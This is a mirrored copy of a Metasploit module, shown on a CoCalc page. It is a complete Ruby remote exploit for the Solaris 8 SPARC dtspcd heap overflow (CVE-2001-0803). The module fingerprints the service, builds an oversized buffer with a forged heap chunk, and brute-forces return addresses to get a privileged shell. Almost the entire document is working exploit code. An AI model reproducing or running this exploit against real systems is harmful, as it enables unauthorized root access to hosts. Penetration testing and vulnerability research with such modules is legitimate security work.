CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/solaris/dtspcd/heap_noir.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'Solaris dtspcd Heap Overflow',13'Description' => %q{14This is a port of noir's dtspcd exploit. This module should15work against any vulnerable version of Solaris 8 (sparc).16The original exploit code was published in the book17Shellcoder's Handbook.18},19'Author' => [ 'noir <noir[at]uberhax0r.net>', 'hdm' ],20'License' => MSF_LICENSE,21'References' =>22[23[ 'CVE', '2001-0803'],24[ 'OSVDB', '4503'],25[ 'BID', '3517'],26[ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],27[ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],2829],30'Privileged' => true,31'Payload' =>32{33'Space' => 800,34'BadChars' => "\x00\x0d",35'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3),36},37'Platform' => 'solaris',38'Arch' => ARCH_SPARC,39'Targets' =>40[41['Solaris 8',42{ 'Rets' =>43[0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ]44}45],46],47'DisclosureDate' => '2002-07-10',48'DefaultTarget' => 0))4950register_options(51[52Opt::RPORT(6112)53])54end555657def exploit58return if not dtspcd_uname()5960target['Rets'][4].each do |tjmp|6162rbase = target['Rets'][1]6364while (rbase < target['Rets'][2]) do65break if session_created?66begin67print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))68attack(target['Rets'][0] + tjmp, rbase, payload.encoded)69break if session_created?7071attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)72rbase += target['Rets'][3]73rescue EOFError74end75end76end7778handler79disconnect80end8182def check83return Exploit::CheckCode::Detected if dtspcd_uname()84return Exploit::CheckCode::Safe85end8687def dtspcd_uname88spc_connect()89spc_write(spc_register('root', "\x00"), 4)90host, os, ver, arch = spc_read().gsub("\x00", '').split(':')9192return false if not host9394print_status("Detected dtspcd running #{os} v#{ver} on #{arch} hardware")95spc_write("", 2)96return true97end9899100def chunk_create(retloc, retadd)101"\x12\x12\x12\x12" +102[retadd].pack('N')+103"\x23\x23\x23\x23\xff\xff\xff\xff" +104"\x34\x34\x34\x34\x45\x45\x45\x45" +105"\x56\x56\x56\x56" +106[retloc - 8].pack('N')107end108109110def attack(retloc, retadd, fcode)111spc_connect()112113begin114buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff" * ((4096 - 8 - fcode.length) / 8)) + fcode115buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"116buf << "\x12\x12\x12\x12\xff\xff\xff\xff"117buf << "\x00\x00\x0f\xf4"118buf << chunk_create(retloc, retadd)119buf << "X" * ((0x103e - 8) - buf.length)120121spc_write(spc_register("", buf), 4)122123handler124125rescue EOFError126end127end128129130def spc_register(user='', buff='')131"4 \x00#{user}\x00\x0010\x00#{buff}"132end133134def spc_write(buff = '', cmd='')135sock.put(sprintf("%08x%02x%04x%04x %s", 2, cmd, buff.length, (@spc_seq += 1), buff))136end137138def spc_read139# Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq140head = sock.get_once(20)141sock.get_once( head[10, 13].hex ) || ''142end143144def spc_connect145disconnect146connect147@spc_seq = 0148end149end150151152